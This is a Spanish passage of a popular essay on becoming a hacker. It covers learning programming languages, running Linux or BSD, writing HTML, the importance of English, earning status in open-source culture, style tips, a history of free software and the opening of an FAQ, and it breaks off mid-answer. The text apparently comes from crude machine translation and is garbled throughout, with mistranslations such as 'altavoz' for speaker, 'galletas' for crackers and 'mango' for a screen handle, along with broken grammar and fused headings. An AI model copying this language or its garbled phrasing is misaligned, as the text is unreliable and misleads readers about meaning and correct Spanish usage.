No hay quizás un punto más general aquí . Si una lengua tiene mucho para ti , puede ser al mismo tiempo una buena herramienta para la producción y una mala para el aprendizaje . No es sólo los idiomas que tienen este problema ; entornos de aplicaciones Web como RubyOnRails , CakePHP , Django puede hacer que sea muy fácil llegar a una especie de entendimiento superficial que te dejará sin recursos cuando se tiene que hacer frente a un problema difícil , o incluso sólo depurar la solución para una fácil.
Si usted entra en la programación seria, usted tendrá que aprender C , el lenguaje básico de Unix. C + + está muy estrechamente relacionado con C; si conoces uno, aprender el otro no va a ser difícil. Ni el lenguaje es una buena para intentar aprender como su primera , sin embargo. Y , en realidad , más que usted puede evitar la programación en C, el más productivo será.
C es muy eficiente, y muy escasa de los recursos de tu máquina. Desafortunadamente , C obtiene que la eficiencia , al exigir que para hacer un montón de gestión de bajo nivel de los recursos ( como la memoria ) a mano. Todo lo que el código de bajo nivel es compleja y propensa bug , y absorberá grandes cantidades de su tiempo en la depuración. Con las máquinas de hoy tan poderosos como lo son , esto es generalmente una mala compensación - es más inteligente de utilizar un lenguaje que utiliza el tiempo de la máquina menos eficiente , pero su tiempo de manera más eficiente. Así, Python.
Otros lenguajes de particular importancia para los hackers son Perl y LISP . Perl vale la pena aprender , por razones prácticas ; que es muy ampliamente utilizado para páginas web activas y la administración del sistema , por lo que incluso si usted nunca escribes Perl usted debe aprender a leerlo. Mucha gente usa Perl en el camino le sugiero que use Python, para evitar la programación C en trabajos que no requieren eficiencia de la máquina de C . Tendrá que ser capaz de entender el código.
LISP es digno de aprender por una razón diferente - la experiencia de la iluminación profunda que usted tendrá cuando usted finalmente lo consigue . Esa experiencia le hará un mejor programador para el resto de tus días , incluso si nunca utiliza realmente LISP sí mucho. ( Usted puede obtener algo de experiencia que comienza con LISP con bastante facilidad por la escritura y la modificación de los modos de edición para el editor de texto Emacs, o Script-Fu plugins para GIMP . )
Lo mejor es , en realidad , para aprender los cinco de Python , C / C + + , Java , Perl y LISP . Además de ser las lenguas de hacking más importantes , que representan diferentes enfoques de programación , y cada uno le educarán en maneras valiosas .
Pero tenga en cuenta que usted no alcanzará el nivel de habilidad de un hacker o incluso simplemente un programador simplemente por la acumulación de idiomas - que necesita para aprender a pensar en los problemas de programación de manera general , independiente de cualquier idioma . Para ser un hacker de verdad , tiene que llegar al punto en donde se puede aprender un nuevo idioma en el día , relacionando lo que está en el manual de lo que ya sabes . Esto significa que debes aprender varios lenguajes muy diferentes .
No puedo dar instrucciones completas sobre cómo aprender a programar aquí - es una habilidad compleja . Pero te puedo decir que los libros y los cursos no lo harán - muchos, quizás la mayoría de los mejores hackers son autodidactas . Usted puede aprender las características del lenguaje - pedacitos de conocimiento - de los libros, pero la mentalidad que hace que ese conocimiento en habilidades de vida sólo se pueden aprender mediante la práctica y el aprendizaje . ¿Qué va a hacer es ( a) Código de la lectura y ( b ) la escritura de código .
Peter Norvig , que es uno de los mejores hackers de Google y el co -autor del libro de texto más utilizados en la AI , ha escrito un excelente ensayo titulado Aprendiendo Programación de los Diez Años. Su " receta para el éxito de programación " Vale la pena una cuidadosa atención .
Aprender a programar es como aprender a escribir bien en lenguaje natural. La mejor manera de hacerlo es leer algunas cosas escritas por los maestros de la forma , escribir algunas cosas tú mismo , leer mucho más , escribir un poco más, leer mucho más , escribir un poco más ... y repetir hasta que comience su escritura para desarrollar la clase de fuerza y ​​economía que se ve en sus modelos.
Encontrar un buen código para leer solía ser duro, porque había pocos programas grandes disponibles en la fuente de pichón hackers para leer y jugar con . Esto ha cambiado drásticamente ; software de fuente abierta , herramientas de programación y sistemas operativos (todas construidas por hackers ) están ampliamente disponibles . Lo que me lleva perfectamente a nuestro siguiente tema ...2 . Conseguir uno de los sistemas Unix de código abierto y aprender a usar y ejecutarlo.
Voy a suponer que usted tiene una computadora personal o puedo obtener acceso a uno. ( Tome un momento para apreciar lo mucho que eso significa. La cultura hacker originalmente evolucionó hacia atrás cuando las computadoras eran tan caros que los individuos no podían ser propietarias de ellas. ) El paso más importante que cualquier novato puede tomar hacia la adquisición de habilidades de hacker es obtener una copia de Linux o uno de los BSD Unix , instalarlo en una máquina personal, y ejecutarlo.
Sí , hay otros sistemas operativos en el mundo además de Unix. Pero están distribuidos en binario - no se puede leer el código , y no es posible modificarla. Tratando de aprender a hackear en una máquina de Microsoft Windows o de cualquier otro sistema de código cerrado es como tratar de aprender a bailar mientras lleva puesto un yeso en el cuerpo .
En Mac OS X es posible , pero sólo una parte del sistema es de código abierto - es muy probable que golpear un montón de paredes , y hay que tener cuidado de no desarrollar el mal hábito de depender de código propietario de Apple. Si te concentras en Unix bajo el capó se puede aprender algunas cosas útiles.
Unix es el sistema operativo de la Internet . Mientras que usted puede aprender a usar Internet sin saber Unix , no se puede ser un hacker de Internet sin entender Unix. Por este motivo, la cultura hacker de hoy es bastante fuertemente centrada en Unix. ( Esto no fue siempre así, y algunos hackers de los viejos tiempos aún no están contentos al respecto, pero la simbiosis entre Unix y la Internet se ha convertido en lo suficientemente fuerte que el músculo incluso de Microsoft no parece capaz de hacer mella seriamente. )
Por lo tanto, abrir un Unix - Me gusta Linux mí mismo, pero hay otras maneras ( y sí , puede ejecutar Linux y Microsoft Windows en la misma máquina). Aprenderlo. Ejecutarlo. Jugar con él . Hable con el Internet con ella. Lea el código. Modifique el código . Vas a obtener mejores herramientas de programación (incluidos C , LISP , Python y Perl ) que cualquier otro sistema operativo de Microsoft puede soñar hosting, te divertirás y podrás disfrutar de un mayor conocimiento de lo que crees que estás aprendiendo hasta uno mira hacia atrás en él como un maestro hacker .
Para más información sobre el aprendizaje de Unix , consulte El Loginataka . Usted también puede tener una mirada en el arte de la programación Unix.
Para conseguir sus manos en un sistema Linux , consulte el Linux Online ! sitio; se puede descargar desde allí o (mejor idea) encontrar un grupo local de usuarios de Linux que le ayude con la instalación.
Durante los primeros diez años de vida de este COMO , informé que desde el punto de vista de un usuario nuevo, todas las distribuciones de Linux son casi equivalentes . Pero en el período 2006-2007 , una mejor opción real surgió : Ubuntu . Mientras que otras distros tienen sus propias áreas de fortaleza , Ubuntu es , de lejos, el más accesible a los novatos en Linux . Tenga cuidado, sin embargo, de la interfaz de escritorio horrible y casi inutilizable "Unidad" que Ubuntu introducido como un defecto unos años más tarde ; las variantes Xubuntu o Kubuntu son mejores.
Usted puede encontrar BSD Unix ayuda y recursos a www.bsd.org .
Una buena manera de sumergir sus pies en el agua es para arrancar lo que los fans de Linux llaman un CD en vivo , una distribución que se ejecuta por completo desde un CD sin tener que modificar el disco duro. Esta será lento , porque los CDs son lentos, pero es una manera de echar un vistazo a las posibilidades sin tener que hacer nada drástico .
He escrito una introducción a los conceptos básicos de Unix y la Internet.
Yo solía recomendar contra la instalación de Linux o BSD como un proyecto en solitario , si eres un novato . Hoy en día los instaladores han vuelto lo suficientemente bueno que hacerlo enteramente por su cuenta es posible, incluso para un novato . Sin embargo , aún así, recomiendo hacer contacto con el grupo de su usuario Linux local y pedir ayuda . No puede hacer daño , y puede facilitar el proceso .3 . Aprender a utilizar la World Wide Web y escribir en HTML.
La mayor parte de las cosas que la cultura hacker ha construido hacer su trabajo fuera de la vista , ayudando a las fábricas y oficinas y universidades de ejecución sin ningún efecto evidente en cómo viven los no -hackers . La Web es la gran excepción , el enorme juguete de hackers brillante que incluso los políticos admiten que ha cambiado el mundo . Sólo por esta razón (y un montón de otros buenos también) que necesita para aprender a trabajar la Web.
Esto no sólo significa aprender a conducir un navegador ( cualquiera puede hacer eso ), pero aprender a escribir HTML, el lenguaje de marcado de la Web. Si no sabes programar , escribir HTML te enseñará algunos hábitos mentales que te ayudarán a aprender . Así que construir una página de inicio . Trate de mantener XHTML, que es un lenguaje más limpio que el HTML clásico. ( Existen buenos tutoriales para principiantes en la Web , aquí hay uno. )
Pero sólo tener una página de inicio no es ni de lejos suficiente para hacer que un usuario remoto. La Web está llena de páginas de inicio . La mayoría de ellos son inútiles , cero contenido de lodos - lodos muy llamativo aspecto , eso sí , pero lodo lo mismo ( para más detalles, véase The Hell página HTML).
Para merecer la pena , tu página debe tener contenido - debe ser interesante y / o útil para otros hackers . Y eso nos lleva al siguiente tema ...4 . Si usted no tiene Inglés funcional , aprenderlo.
Como un Inglés - altavoz americano y nativo de mí mismo, he estado previamente reacio a sugerir esto , para que no se puede tomar como una especie de imperialismo cultural. Pero varios hablantes nativos de otras lenguas me han urgido a señalar que el Inglés es el idioma de trabajo de la cultura hacker y de Internet, y que se necesita saber para funcionar en la comunidad hacker .
Allá por el 1991 me enteré de que muchos hackers que tienen Inglés como segunda lengua, lo utilizan en las discusiones técnicas , incluso cuando comparten una lengua de nacimiento; se informó a mí en el momento en que el Inglés tiene un vocabulario técnico más rico que cualquier otro idioma , por lo que no es más que una mejor herramienta para el trabajo. Por razones similares, las traducciones de libros técnicos escritos en Inglés son a menudo insatisfactorios ( cuando se hacen en todos).
Linus Torvalds, un finlandés , comenta su código en Inglés ( que al parecer nunca se le ocurrió hacerlo de otra manera ) . Su fluidez en Inglés ha sido un factor importante en su capacidad para reclutar una comunidad mundial de desarrolladores de Linux. Es un ejemplo digno de seguir .
Ser un Inglés - altavoz nativo no garantiza que usted tiene las habilidades lingüísticas lo suficientemente bueno para funcionar como un hacker . Si su escritura es semi -analfabeto , no gramatical , y plagado de errores ortográficos , muchos hackers ( incluido yo mismo ) tenderán a ignorarte . Mientras que la escritura descuidada no siempre significa pensamiento descuidado , hemos encontrado generalmente la correlación sea fuerte - y no tenemos ningún uso para los pensadores descuidados . Si todavía no se puede escribir de forma competente , aprender.Estado en el Hacker Cultura
1 . Escribir software de fuente abierta2 . Prueba de Ayuda y software de código abierto de depuración3 . Publicar información útil4 . Ayudar a mantener el funcionamiento de infraestructuras5 . Servir la propia cultura hacker
Como la mayoría de las culturas sin economía monetaria , los hackers se ejecuta en la reputación . Usted está tratando de resolver problemas interesantes , pero lo interesante que son, y si sus soluciones son realmente bueno, es algo que sólo sus compañeros técnicos o superiores son normalmente equipados para juzgar.
Por consiguiente, cuando usted juega el juego hacker, se aprende a llevar la cuenta sobre todo por lo que otros hackers pensar en su habilidad (por eso usted no es realmente un hacker hasta que otros hackers consistentemente que una llamada ) . Este hecho se ve oscurecido por la imagen del hacking como trabajo solitario ; también por un tabú hacker culturales (que desciende gradualmente desde finales de 1990 , pero todavía potente ) en contra de la admisión de que el ego o la validación externa están implicados en la motivación de uno en todos.
En concreto , los hackers es lo que los antropólogos llaman una cultura del don . Usted gana estatus y reputación en no al dominar a otras personas , ni por ser hermosa , ni por tener cosas que otras personas quieren , sino más bien por regalar cosas . Específicamente , al regalar su tiempo, su creatividad, y los resultados de su habilidad.
Básicamente, hay cinco tipos de cosas que usted puede hacer para ser respetado por los hackers :1 . Escribir software de fuente abierta
El primero ( el más central y más tradicional ) es escribir programas que los otros hackers piensan son divertidos o útiles , y dar a las fuentes de programa de distancia a toda la cultura hacker de utilizar.
( Solíamos llamar a estas obras "software libre" , pero esta confundido demasiadas personas que no estaban seguros exactamente lo "libre" se supone que significa eso . La mayoría de nosotros preferimos el término software " de código abierto ") .
Semidioses más venerados de los hackers son personas que han escrito programas de gran envergadura , capaz que cumplen una necesidad generalizada y les regalan , por lo que ahora todo el mundo los usa.
Pero hay un poco de una perspectiva histórica muy bien aquí . Mientras que los hackers siempre han mirado a los desarrolladores de código abierto entre ellos como núcleo duro de nuestra comunidad, antes de mediados de la década de 1990 la mayoría de los hackers mayor parte del tiempo trabajado en código cerrado . Esto fue cierto aún cuando escribí la primera versión de este COMO en 1996; que tomó la integración de software de código abierto después de 1997 para cambiar las cosas . Hoy en día, " la comunidad hacker" y " los desarrolladores de código abierto " son dos descripciones de lo que es esencialmente la misma cultura y población - pero vale la pena recordar que esto no siempre fue así. ( Para más información sobre esto, vea la sección llamada " Nota Histórica: Hacking, de código abierto y el software libre " . )2 . Prueba de Ayuda y software de código abierto de depuración
También sirven los que ponerse de pie y software de código abierto de depuración. En este mundo imperfecto , inevitablemente pasan la mayor parte de nuestro tiempo de desarrollo de software en la fase de depuración. Es por eso que cualquier autor de código abierto que es el pensamiento le dirá que las buenas beta-testers ( que saben cómo describir los síntomas claramente , localizar bien los problemas , puede tolerar errores en un comunicado de rapidito , y están dispuestos a aplicar unas cuantas rutinas sencillas de diagnóstico ) son vale su peso en rubíes. Incluso uno de ellos puede hacer la diferencia entre una fase de depuración que es una prolongada pesadilla agotadora y uno que es más que una molestia saludable .
Si eres un novato , tratar de encontrar un programa en desarrollo que usted está interesado en y ser un buen beta- tester. Hay una progresión natural desde ayudar a los programas de prueba para ayudar a depurarlos a ayudar a modificarlos . Usted va a aprender mucho de esta manera , y generar buen karma con las personas que le ayudarán en el futuro.3 . Publicar información útil
Otra cosa buena es recopilar y filtrar información útil e interesante en páginas web o documentos como las preguntas más frecuentes (FAQ ) Listas , y hacer los que generalmente disponible.
Mantenedores de las principales FAQs técnicos reciben casi tanto respeto como los autores de código abierto.4 . Ayudar a mantener el funcionamiento de infraestructuras
La cultura hacker (y el desarrollo de la ingeniería de Internet, para el caso) está dirigido por voluntarios. Hay una gran cantidad de trabajo necesario pero sin glamour que debe hacerlo para mantenerlo en marcha - la gestión de listas de correo , grupos de noticias de la moderación , el mantenimiento de grandes sitios de archivos de software , desarrollar RFCs y otros estándares técnicos.
Las personas que hacen este tipo de cosas así obtener una gran cantidad de respeto, porque todo el mundo sabe que estos puestos de trabajo son enormes pérdidas de tiempo y no es tan divertido como jugar con el código . Hacerlo les muestra dedicación.5 . Servir la propia cultura hacker
Por último, puede servir y propagar la cultura misma ( mediante, por ejemplo , escribir una imprimación precisa sobre cómo convertirse en un hacker :-)) . Esto no es algo que se pondrá en posición de hacerlo hasta que usted ha estado alrededor para mientras y os hacéis bien conocida por una de las primeras cuatro cosas.
La cultura hacker no tiene líderes , exactamente , pero tiene héroes de la cultura y los ancianos de las tribus y los historiadores y portavoces . Cuando has estado en las trincheras tiempo suficiente, podrán crecer en uno de estos. Tenga cuidado : los hackers desconfían del ego descarado en sus ancianos de las tribus , tan visiblemente alcanzando para este tipo de fama es peligrosa. En lugar de luchar por ella, lo que tienes que tipo de posicionarse de manera que caiga en su regazo , y luego ser modesto y gracioso acerca de su estado .La conexión Hacker / Nerd
Contrario al mito popular, no tienes que ser un nerd para ser un hacker . Sí ayuda , sin embargo, y muchos hackers son nerds en hechos. Siendo una especie de marginado social le ayuda a mantenerse concentrado en las cosas realmente importantes , como el pensamiento y la piratería .
Por esta razón, muchos hackers han adoptado la etiqueta ' friki ' como una insignia de orgullo - es una forma de declarar su independencia de las expectativas sociales normales (así como una afición por otras cosas como juegos de ciencia ficción y de estrategia que a menudo pasan de ser un hacker ) . El término ' empollón ' solía ser utilizado de esta manera de nuevo en la década de 1990 , en la época ' empollón ' fue un leve peyorativo y ' friki ' una vez más dura uno ; en algún momento después de 2000 se cambiaron de lugar , al menos en la cultura popular EE.UU. , y ahora hay incluso una importante cultura geek- orgullo entre personas que no son expertos en tecnología .
Si usted puede manejar para concentrarse lo suficiente en la piratería para ser bueno en eso y seguir teniendo una vida, eso está muy bien . Esto es mucho más fácil de lo que era cuando yo era un novato en la década de 1970 ; la cultura dominante es mucho más amigable con los tecno- nerds ahora . Incluso hay un número creciente de personas que se dan cuenta de que los hackers suelen ser amante de alta calidad y material cónyuge.
Si te sientes atraído por la piratería , ya que no tiene una vida , eso está bien también - al menos no tendrás problemas para concentrarse . Tal vez tengas una vida más adelante.Puntos para el estilo
Una vez más, ser un hacker , tienes que entrar en la mentalidad de los piratas cibernéticos. Hay algunas cosas que usted puede hacer cuando usted no está en un equipo que parece ayudar . No son sustitutos de la piratería (nada lo es) pero muchos hackers que lo hagan , y sienten que se conectan de alguna forma básica con la esencia de la piratería .

    Aprender a escribir bien su lengua materna. Aunque es un estereotipo común que los programadores no pueden escribir , un número sorprendente de hackers (incluyendo todas las más logradas que yo sepa) son escritores muy capaces .

    Leer la ciencia ficción. Ir a las convenciones de ciencia ficción ( una buena manera de conocer a los hackers y proto -hackers ) .

    Únase a un hackerspace y hacer las cosas ( otra buena manera de conocer a los hackers y proto -hackers ) .

    Tren en una forma de artes marciales . El tipo de disciplina mental necesaria para las artes marciales parece ser similar en forma importante a lo que los hackers hacen. Las formas más populares entre los hackers son definitivamente asiáticas de artes de mano vacía como Tae Kwon Do, diversas formas de Karate , Kung Fu, Aikido o Ju Jitsu. Esgrima y espada asiática artes occidentales también tienen seguidores visibles. En los lugares donde es legal , el tiro con pistola ha estado aumentando en popularidad desde finales de 1990 . Los más hackerly artes marciales son aquellos que hacen hincapié en la disciplina mental, la conciencia relajada , y un control preciso , en lugar de la fuerza bruta , el atletismo , o resistencia física.

    Estudiar una disciplina de meditación real. El Elegido constantemente por los piratas informáticos es Zen ( importante aún, es posible beneficiarse de Zen sin adquirir una religión o descartando la que ya tiene ) . Otros estilos pueden trabajar también, pero tenga cuidado de elegir uno que no requiere que usted a creer cosas locas .

    Desarrollar un oído analítico para la música. Aprende a apreciar las clases particulares de música. Aprende a jugar bien algún instrumento musical o cantar.

    Desarrolle su apreciación de los juegos de palabras y juegos de palabras .
Entre más de estas cosas que usted ya hace , lo más probable es que usted es material de hackers natural. ¿Por qué estas cosas en particular, no es del todo claro , pero están conectados con una mezcla de habilidades de izquierda y derecha del cerebro que parece ser importante ; hackers tienen que tener la capacidad para razonar lógicamente y dar un paso fuera de la lógica aparente de un problema en cualquier momento .
Trabajar con la misma intensidad a medida que juega y juega con la misma intensidad a medida que trabaja . Para los verdaderos hackers , los límites entre "trabajo", " juego", " ciencia" y "arte" todos tienden a desaparecer, o fusionar en una alegría creativa de alto nivel. Además, no contentarse con un estrecho rango de habilidades. Aunque la mayoría de los hackers auto- describen como programadores , son muy propensos a ser más que competente en varias habilidades relacionadas - la administración del sistema , diseño de páginas web , y la solución de problemas de hardware de PC son los más comunes . Un hacker que es un administrador del sistema , por otro lado, es probable que sean muy hábiles en programación de scripts y diseño web. Los hackers no hacen las cosas a medias ; si invierten en una habilidad en absoluto, que tienden a ser muy bueno en eso.
Por último , un par de cosas que no debes hacer .

    No utilice un ID de usuario grandiosa tonta o nombre de pantalla.

    Evite el contacto con discusiones sin sentido en Usenet (o en cualquier otro lugar ) .

    No llame a sí mismo un " cyberpunk " , y no perder el tiempo a nadie que lo haga.

    No se debe publicar o escribir e-mail que está lleno de errores de ortografía y mala gramática .
La única reputación que va a hacer hacer cualquiera de estas cosas es como un imbécil . Los hackers tienen una gran memoria - que podría tomar años para vivir sus primeras torpezas lo suficiente como para ser aceptado.
El problema con los nombres de pantalla o las manijas merece algo de amplificación. Ocultando su identidad detrás de un mango es un menor y el comportamiento tonto característico de galletas, d00dz warez , y otras formas de vida inferiores . Los hackers no hacen esto ; que están orgullosos de lo que hacen y lo quieren asociado con sus nombres reales . Así que si usted tiene un mango, lo deje caer. En la cultura hacker que sólo le marcará como un perdedor.Nota histórica : Hacking, Open Source y Software Libre
Cuando escribí originalmente este how-to a finales de 1996 , algunas de las condiciones que lo rodean eran muy diferente de la manera que miran hoy. Unas palabras acerca de estos cambios pueden ayudar a aclarar cuestiones para las personas que están confundidos acerca de la relación de código abierto, software libre y Linux a la comunidad hacker . Si no eres curioso acerca de esto, usted puede saltar directamente a las preguntas más frecuentes y bibliografía de aquí.
El ethos de la comunidad hacker y como la he descrito aquí es muy anterior a la aparición de Linux después de 1990 ; La primera vez que se involucró con alrededor de 1976 y , sus raíces son fácilmente detectables de nuevo a principios de 1960. Pero antes de Linux , la mayoría de la piratería se hizo en cualquiera de los sistemas operativos propietarios o un puñado de sistemas de cosecha propia cuasi- experimentales como ITS del MIT que nunca fueron desplegados fuera de sus nichos académicos originales. Si bien ha habido algunos antes (pre- Linux) los intentos de cambiar esta situación, su impacto fue en el mejor de muy marginal y restringido a las comunidades de creyentes dedicados que eran pequeñas minorías , incluso dentro de la comunidad hacker , y mucho menos con respecto al resto del mundo de software en general .
Lo que ahora se llama " código abierto" se remonta tan lejos como la comunidad hacker lo hace, pero hasta 1985 era una práctica popular sin nombre en lugar de un movimiento consciente de las teorías y manifiestos que se le atribuye . Esta prehistoria terminó cuando , en 1985 , el arco hacker Richard Stallman ( " RMS ") trató de darle un nombre - "software libre" . Pero su acto de nombramiento fue también un acto de reivindicación ; adjuntó bagaje ideológico a la etiqueta "software libre ", que gran parte de la comunidad hacker existente nunca aceptaron . Como resultado , la etiqueta de "software libre " ha sido fuertemente rechazada por una minoría sustancial de la comunidad hacker (especialmente entre los asociados con BSD Unix) , y se utiliza con serias reservas , pero en silencio por una mayoría del resto ( incluido yo mismo) .
A pesar de estas reservas , de RMS pretenden definir y llevar a la comunidad de hackers bajo la bandera de "software libre" en términos generales se mantuvo hasta mediados de la década de 1990. Fue seriamente amenazada sólo por el auge de Linux. Linux dio de desarrollo de código abierto un hogar natural. Muchos proyectos emitidos bajo términos que ahora llamaríamos de código abierto emigraron de Unix propietarias para Linux. La comunidad alrededor de Linux creció explosivamente , llegando a ser mucho más grande y más heterogéneo de la cultura hacker pre - Linux. RMS con determinación intentaron cooptar a toda esta actividad en su movimiento "software libre" , pero fue frustrado por tanto la diversidad de la explosión de la comunidad Linux y el escepticismo del público de su fundador, Linus Torvalds . Torvalds continuó utilizando el término "software libre " por falta de otra alternativa , pero rechazó públicamente bagaje ideológico de RMS. Muchos hackers jóvenes siguieron su ejemplo.
En 1996 , cuando por primera vez publiqué este COMO Hacker, la comunidad hacker estaba reorganizando rápidamente alrededor Linux y un puñado de otros sistemas operativos de código abierto (en particular los descendientes de BSD Unix ) . Memoria de la Comunidad del hecho de que la mayoría de nosotros había pasado décadas el desarrollo de software de código cerrado en los sistemas operativos de código cerrado aún no había comenzado a desvanecerse, pero ese hecho ya estaba empezando a parecer como parte de un pasado muerto ; hackers eran , cada vez más, se definen como hackers por sus adjuntos para abrir - fuente proyectos como Linux o Apache .
El término "código abierto" , sin embargo , aún no había surgido ; no lo haría hasta principios de 1998 cuando lo hizo, la mayor parte de la comunidad hacker lo adoptaron dentro de los seis meses siguientes. ; las excepciones fueron una minoría ideológicamente unido al término " software libre" . Desde 1998, y especialmente después de alrededor de 2003 , la identificación de ' piratería ' por ' de código abierto (y software libre) el desarrollo " se ha convertido en extremadamente cerca . Hoy en día no tiene mucho sentido en el intento de distinguir entre estas categorías , y parece poco probable que eso cambie en el futuro.
Vale la pena recordar , sin embargo, que esto no siempre fue así.Otros recursos
Paul Graham ha escrito un ensayo titulado Los grandes hackers , y otro en el pregrado , en la que habla mucha sabiduría .
Hay un documento llamado Cómo ser un programador que es un excelente complemento a éste. Cuenta con valiosos consejos no sólo de codificación y de habilidades , sino de cómo funcionar en un equipo de programación .
También he escrito una breve historia de la cultura hacker .
He escrito un artículo , La Catedral y el Bazar , lo que explica mucho sobre cómo funcionan las culturas de Linux y de código abierto. He abordado este tema aún más directamente en su secuela Homesteading la Noosfera .
Rick Moen ha escrito un excelente documento sobre cómo dirigir un grupo de usuarios de Linux.
Rick Moen y yo hemos colaborado en otro documento sobre Cómo hacer preguntas inteligentes . Esto le ayudará a obtener la asistencia de una manera que hace que sea más probable que usted realmente va a conseguirlo .
Si usted necesita la instrucción en los fundamentos de cómo las computadoras personales, Unix , y el trabajo en Internet , revise el CÓMO de Unix y de Internet Fundamentos .
Cuando suelte el software o escribir parches para el software , trate de seguir las directrices en el HOWTO Practice Software Release.
Si te ha gustado el poema Zen , tal vez te guste Rootless Raíz: Las Koans Unix de Maestro Foo.Preguntas más frecuentes


Preguntas más frecuentes
Q : ¿Cómo puedo saber si ya soy un hacker ?Q : ¿Me enseñarás cómo hackear ?Q : ¿Cómo puedo comenzar a trabajar , entonces?Q : ¿Cuándo hay que empezar ? ¿Es demasiado tarde para mí para aprender ?Q : ¿Cuánto tiempo me tomará para aprender a hackear ?Q : ¿Es Visual Basic un buen lenguaje para empezar?Q : ¿Podría ayudarme a romper un sistema, o enseñarme a romper ?Q : ¿Cómo puedo obtener la contraseña de la cuenta de otra persona?Q : ¿Cómo puedo romper en / leer / monitorizar el correo de alguien más?Q : ¿Cómo puedo robar privilegios de operador de canal en el IRC ?Q : He estado agrietado. ¿Me ayudará a defenderse de nuevos ataques ?Q : Estoy teniendo problemas con mi software de Windows. ¿Me ayudas ?Q : ¿Dónde puedo encontrar algunos hackers de verdad para hablar con ?Q : ¿Me puede recomendar libros útiles sobre temas relacionados con la piratería - ?Q : ¿Necesito ser bueno en matemáticas para convertirse en un hacker?Q : ¿Qué lenguaje debo aprender primero ?Q : ¿Qué tipo de hardware necesito ?Q : Yo quiero contribuir . ¿Puedes ayudarme a escoger un problema para trabajar?Q : ¿Necesito odiar y bash Microsoft ?Q : Pero no lo hará de código abierto a los programadores de licencia de software que no pueden ganarse la vida ?Q : ¿Dónde puedo obtener un Unix libre ?
Q :

¿Cómo puedo saber si ya soy un hacker ?
A:

Hágase las siguientes tres preguntas :

    ¿Habla usted de código, con fluidez?

    ¿Se identifica con los objetivos y valores de la comunidad hacker?

    Tiene un miembro bien establecido de la comunidad hacker nunca te llama un hacker?
Si usted puede responder sí a estas tres preguntas, ya es un hacker . No solo dos son suficientes.
La primera prueba es acerca de las habilidades . Probablemente pasará si usted tiene las habilidades técnicas mínimas descritas anteriormente en este documento. Usted soplar a través de él si ha tenido una gran cantidad de código aceptado por un proyecto de desarrollo de código abierto .
La segunda prueba es cuestión de actitud . Si los cinco principios de la mentalidad de hackers parecía obvio para usted , más como una descripción de la forma en que vive ya que cualquier novela, ya se encuentra a medio camino de pasarlo . Ese es el medio hacia el interior ; la otra , hacia el exterior medio es el grado en el que usted se identifica con proyectos a largo plazo de la comunidad de hackers .
Aquí es una lista incompleta , pero indicativa de algunos de esos proyectos : ¿Es importante para usted que Linux mejorar y propaga? ¿Eres un apasionado de la libertad del software ? Hostil a los monopolios ? ¿Actúa usted en la creencia de que las computadoras pueden ser instrumentos de empoderamiento que hacen del mundo un lugar más rico y más humano ?
Sin embargo, una nota de precaución está en orden aquí. La comunidad hacker tiene algunos intereses específicos, principalmente defensivas políticos - dos de ellos están defendiendo los derechos de libertad de expresión y defendiéndose de " propiedad intelectual" - juego de poder que harían de código abierto ilegal. Algunos de esos proyectos a largo plazo son organizaciones de libertades civiles como la Electronic Frontier Foundation , y la actitud hacia el exterior incluye adecuadamente el apoyo de ellos . Pero más allá de eso , la mayoría de los hackers ven los intentos de sistematizar la actitud de hackers en un programa político explícito con recelo ; que hemos aprendido , por las malas , que estos intentos son divisivos y de distracción . Si alguien trata de reclutar a marchar de su capital en el nombre de la actitud hacker, que han perdido el punto . La respuesta correcta es, probablemente, "Cállate y mostrarles el código. "
La tercera prueba tiene un elemento difícil de recursividad al respecto. Observé en la sección llamada " ¿Qué es un hacker ? " Que el ser un hacker es en parte una cuestión de pertenencia a una subcultura o una red social con una historia compartida , un interior y un exterior. En el pasado lejano , los hackers eran un grupo mucho menos cohesionado y consciente de sí mismo de lo que son hoy. Pero la importancia del aspecto de la red social ha aumentado en los últimos treinta años como la Internet ha hecho que las conexiones con el núcleo de la subcultura hacker de más fácil de desarrollar y mantener. Un índice de comportamiento fácil del cambio es que , en este siglo , tenemos nuestras propias camisetas .
Los sociólogos , que estudian las redes como las de la cultura hacker bajo la rúbrica general de "colegios invisibles" , han señalado que una de las características de este tipo de redes es que tienen porteros - Los miembros del núcleo con la autoridad social para apoyar a nuevos miembros en la red. Debido a que el "colegio invisible" que es la cultura hacker es una suelta e informal , el papel de guardián es informal también. Pero una cosa que todos los hackers entienden en sus huesos es que no todos los hackers es un gatekeeper. Los porteros tienen que tener un cierto grado de antigüedad y de la realización antes de poder otorgar el título . ¿Cuánto es difícil de cuantificar, pero todos los hackers lo sabe cuando lo ven .
Q :

¿Me enseñarás cómo hackear ?
A:

Desde que publicó por primera vez esta página , he recibido varias solicitudes a la semana (a menudo varios al día ) de la gente que " me enseñe todo sobre hackeo " . Por desgracia, yo no tengo el tiempo ni la energía para hacer esto ; mis propios proyectos de hackeo , y trabajo como defensor de código abierto, ocupan el 110% de mi tiempo.
Incluso si lo hiciera , la piratería es una actitud y habilidad que básicamente tienen que aprender por su cuenta . Usted encontrará que mientras los verdaderos hackers quieren ayudarte , ellos no te respetarán si piden ser alimentados con cuchara todo lo que saben.
Aprenda algunas cosas primero . Demuestre que usted está tratando , que usted es capaz de aprender por su cuenta. Ahora vamos a los hackers que se reúnen con preguntas específicas .
Si Ud. envía correo a un hacker pidiéndole consejo , aquí hay dos cosas que debe saber por adelantado. En primer lugar, hemos encontrado que las personas que son perezosos o descuidados en sus escritos suelen ser demasiado perezosos y descuidados en su forma de pensar para hacer buenos hackers - así que tenga cuidado de escribir correctamente , y utilizar la buena gramática y la puntuacion , de lo contrario es probable que sea ignorado . En segundo lugar, no se atreven a pedir una respuesta a una cuenta ISP que es diferente de la cuenta que va a enviar a partir ; nos encontramos con personas que sí que suelen ser los ladrones que utilizan cuentas robadas , y no tenemos ningún interés en el robo de recompensa o ayuda .
Q :

¿Cómo puedo comenzar a trabajar , entonces?
A:

La mejor manera para que usted pueda comenzar probablemente sería ir a un ( grupo de usuarios de Linux) reunión LUG . Usted puede encontrar este tipo de grupos en el PLD general Linux Página de información ; es probable que haya uno cerca de usted , posiblemente asociado a un colegio o universidad. Los miembros del LUG probablemente le dará un Linux si lo pides, y sin duda ayudará a instalar uno y empezar.
Su próximo paso (y el primer paso si no puede encontrar un LUG cerca) deberían ser encontrar un proyecto de código abierto que te interese. Empieza a leer el código y la revisión de los errores . Aprenda a contribuir y trabajar su camino pulg
